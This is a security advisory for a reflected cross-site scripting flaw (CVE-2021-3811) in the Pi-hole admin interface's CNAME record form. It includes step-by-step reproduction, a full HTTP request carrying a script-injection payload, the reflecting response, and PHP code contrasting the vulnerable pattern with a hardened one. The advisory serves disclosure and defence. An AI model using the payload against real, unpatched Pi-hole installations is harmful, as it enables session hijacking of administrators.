Cross-site Scripting (XSS) - Reflected in pi-hole/adminlte

Moderate
PromoFaux published GHSA-5q5w-qm5m-49qq Sep 17, 2021

Package

Pi-hole Web Interface (n/a)

Affected versions

<=5.5.1

Patched versions

5.6

Description

Originally reported: https://huntr.dev/bounties/fa38c61f-4043-4872-bc85-7fe5ae5cc2e8/

Log in as admin, go to Local DNS -> CNAME Records -> Add a new CNAME record.
Enter <script>alert(1)</script> in the domain field and anything in the target domain field.
The browser URL-encodes the payload in the POST body's domain parameter; a proxy such as Burp can be used to replace it with the decoded value.

POST /admin/scripts/pi-hole/php/customcname.php HTTP/2
Host: pihole.example.com
Cookie: persistentlogin=***; persistentlogin=***; PHPSESSID=***
Content-Length: 109
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pihole.example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pihole.example.com/admin/cname_records.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

action=add&domain=<script>alert(1)</script>&target=a&token=***

HTTP/2 200 OK
Server: nginx/1.21.1
Date: Wed, 01 Sep 2021 10:36:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 78
Access-Control-Allow-Origin: https://pihole.example.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Pi-Hole: The Pi-hole Web interface is working!
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000

{"success":false,"message":"Domain '<script>alert(1)<\/script>' is not valid"}

https://github.com/pi-hole/AdminLTE/blob/fb9bd561fdf936891370d85b32e899dff1dbf9d4/scripts/pi-hole/php/func.php#L294

https://github.com/pi-hole/AdminLTE/blob/fb9bd561fdf936891370d85b32e899dff1dbf9d4/scripts/pi-hole/php/func.php#L401

https://github.com/pi-hole/AdminLTE/blob/fb9bd561fdf936891370d85b32e899dff1dbf9d4/scripts/pi-hole/php/func.php#L312
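The response above reflects the submitted domain unescaped inside the JSON error message while the body is declared as text/html, which is why a browser can render it. The following is an added illustration, not Pi-hole's own code or its actual fix, that places that reflection pattern beside a hardened equivalent; the function names, the hostname regex and the sample input are assumptions.

```php
<?php
// Added illustration, not Pi-hole's code: the reflection pattern from the
// advisory beside a hardened equivalent. Names and regex are assumptions.

// Vulnerable pattern: json_encode() leaves '<' and '>' untouched, and the
// body is declared text/html, so a browser renders the echoed markup.
function reject_domain_vulnerable(string $domain): string
{
    header('Content-Type: text/html; charset=UTF-8');
    return json_encode([
        'success' => false,
        'message' => "Domain '$domain' is not valid",
    ]);
}

// Hardened pattern, three independent layers:
//  1. declare the body as JSON so the browser never treats it as a document,
//     with nosniff so it is not MIME-sniffed back into HTML;
//  2. HTML-escape the reflected value, in case client code inserts the
//     message into the page with innerHTML or jQuery .html();
//  3. encode HTML-significant characters as \uXXXX escapes inside the JSON.
function reject_domain_hardened(string $domain): string
{
    header('Content-Type: application/json; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    $safe = htmlspecialchars($domain, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return json_encode(
        ['success' => false, 'message' => "Domain '$safe' is not valid"],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

// Syntax check (RFC 1123 hostname labels, simplified) run before anything
// is reflected; rejecting here means the raw input never reaches a message.
function is_valid_hostname(string $domain): bool
{
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($domain) <= 253
        && preg_match("/^(?:{$label}\\.)*{$label}$/i", $domain) === 1;
}

// Constructed input mirroring the advisory's payload.
$input = '<script>alert(1)</script>';
if (!is_valid_hostname($input)) {
    echo reject_domain_hardened($input), PHP_EOL;
}
```

The hardened body decodes on the client to an HTML-escaped string, so it is displayed literally whether the front end uses .text() or .html().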

Severity

Moderate

CVE ID

CVE-2021-3811

Weaknesses

No CWEs